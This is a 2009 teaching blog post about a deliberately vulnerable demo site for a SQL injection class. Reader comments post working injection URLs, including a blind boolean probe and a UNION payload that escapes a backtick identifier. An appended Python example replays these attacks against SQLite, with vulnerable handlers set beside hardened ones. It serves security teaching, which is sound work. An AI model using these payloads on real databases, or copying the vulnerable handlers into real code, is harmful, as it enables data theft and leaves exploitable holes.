Teach me SQL injection
Today I’ve given a SQL injection class at the VU University in Amsterdam. I’ve created a website that is vulnerable to SQL injection and I wanted to share this demo/assignment with you. Note that I’ve turned off magic_quotes_gpc (the PHP setting that automatically backslash-escapes quotes in request data) to make life a little easier. The assignment is to find out my age. Whenever somebody has deleted the records in the database, you can reset it. One hint: it runs on a PHP5/MySQL5 environment.
Application: http://server.maussoft.com/~sqlinject/list.php
Reset DB: http://server.maussoft.com/~sqlinject/reset.php
Can you hack this application? Try to do it without looking at the source code. Prove it and post a URL in the comments that injects SQL in such a way that the application shows my age. For the pros: try to do the same on safe1_view.php, safe2_view.php and insert.html/insert.php. If you can do the same on safe3_view.php or safe4_view.php you are officially 1337 in my book…
Maurits
Posted: April 14th, 2009 under Uncategorized.
Comments
Comment from Nahuel
Time: April 20, 2009, 3:29
And then I started to suck :(
Comment from maurits
Time: April 20, 2009, 9:55
@Nahuel: Congratulations on the first two! Hint: you can use the “Firebug”, “Tamper Data” and the “Web Developer Toolbar” addons on Firefox to help you with the others.
Comment from Simon
Time: May 12, 2009, 22:09
Third is also easy:
http://server.maussoft.com/~sqlinject/safe2_view.php?field=age&value=…test several values here
Not too hard when you know the result is an integer in range ~ 17-70.
No idea for the last two, though.
Comment from Alex Turpin
Time: June 15, 2009, 21:36
http://server.maussoft.com/~sqlinject/view.php?id=1%20AND%20age=??
Trial and error ftw.
Comment from maurits
Time: June 15, 2009, 21:50
@alex: Well done!! Now that it got you interested, how about the tougher ones?
Comment from dmitri
Time: July 1, 2009, 19:37
These are very easy.
for safe2_view.php:
http://server.maussoft.com/~sqlinject/safe2_view.php?field=id%60%20=%20-1%20UNION%20SELECT%20age,%20age,%20age,age%20from%20users%20WHERE%20%60id&value=1
will pull the age if you get the right ID which I’m presently too lazy to do.
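The two techniques used in the comments above (Alex Turpin's boolean condition spliced into the numeric id parameter of view.php, and dmitri's identifier injection through the field parameter of safe2_view.php) replayed as an added example against an in-memory SQLite database, so it runs offline without the demo site. This is editor-added code, not the site's PHP: the table layout users(id, name, email, city, age), the hidden age value 42, the sample rows and the function names are all assumptions made for the example. Each vulnerable handler sits next to a hardened version, and the blind search shows why "trial and error" only needs a handful of requests.

```python
"""Added example (not the demo site's code): the injection patterns from the
comments replayed against an in-memory SQLite database.  Assumed schema:
users(id, name, email, city, age); the pages display the first four columns
and the age is the secret.  The value 42 is a constructed placeholder."""
import sqlite3


def make_db():
    """Constructed sample data standing in for the demo's users table."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, "
                "email TEXT, city TEXT, age INTEGER)")
    con.executemany("INSERT INTO users VALUES (?, ?, ?, ?, ?)", [
        (1, "maurits", "m@example.invalid", "Amsterdam", 42),  # assumed age
        (2, "alice", "a@example.invalid", "Utrecht", 31),
    ])
    return con


# --- view.php?id=...: numeric id spliced straight into the WHERE clause ----
def view_vulnerable(con, id_param):
    # A number is not quoted, so quote-escaping would not help here anyway:
    # id=1 AND age=42 simply becomes part of the predicate.
    sql = f"SELECT id, name, email, city FROM users WHERE id = {id_param}"
    return con.execute(sql).fetchall()


def view_safe(con, id_param):
    # Reject anything that is not an integer, then bind it as a parameter.
    try:
        id_value = int(id_param)
    except ValueError:
        raise ValueError(f"id must be an integer, got {id_param!r}") from None
    sql = "SELECT id, name, email, city FROM users WHERE id = ?"
    return con.execute(sql, (id_value,)).fetchall()


def blind_age(con, lo=0, hi=150):
    """Alex Turpin's trial and error automated as a binary search: every
    request asks 'age <= N?' and the page answers by showing the row or not.
    About eight requests cover the range 0..150."""
    while lo < hi:
        mid = (lo + hi) // 2
        if view_vulnerable(con, f"1 AND age <= {mid}"):
            hi = mid
        else:
            lo = mid + 1
    return lo


# --- safe2_view.php?field=...&value=...: value escaped, column name not ----
def safe2_vulnerable(con, field, value):
    # The value is escaped (a stand-in for mysql_real_escape_string), but the
    # column name is pasted between backticks.  A backtick inside `field`
    # closes the identifier and the rest of the string runs as SQL, which is
    # how dmitri's UNION payload pushes the age out through the 4 displayed
    # columns.  SQLite accepts backtick identifiers just like MySQL.
    escaped = value.replace("'", "''")
    sql = (f"SELECT id, name, email, city FROM users "
           f"WHERE `{field}` = '{escaped}'")
    return con.execute(sql).fetchall()


ALLOWED_FIELDS = {"id", "name", "email", "city"}   # age deliberately absent


def safe2_safe(con, field, value):
    # Identifiers cannot be bound as parameters, so allow-list them and bind
    # only the value.  Keeping age out of the list also closes Simon's
    # field=age&value=N guessing route.
    if field not in ALLOWED_FIELDS:
        raise ValueError(f"unknown field {field!r}")
    sql = f"SELECT id, name, email, city FROM users WHERE {field} = ?"
    return con.execute(sql, (value,)).fetchall()


# dmitri's payload from the comment above, matching the page's 4-column SELECT
UNION_PAYLOAD = "id` = -1 UNION SELECT age, age, age, age FROM users WHERE `id"


if __name__ == "__main__":
    con = make_db()
    print(view_vulnerable(con, "1 AND age=42"))        # the row comes back
    print(blind_age(con))                              # 42
    print(safe2_vulnerable(con, UNION_PAYLOAD, "1"))   # [(42, 42, 42, 42)]
```

The point of the two hardened handlers is that they fix different things: `view_safe` fixes the value (an integer is validated and bound), while `safe2_safe` fixes the identifier, which no database driver can bind for you, so the only defence is an allow-list of column names. Escaping the value alone, as safe2_view.php does in dmitri's reading of it, leaves the column name wide open.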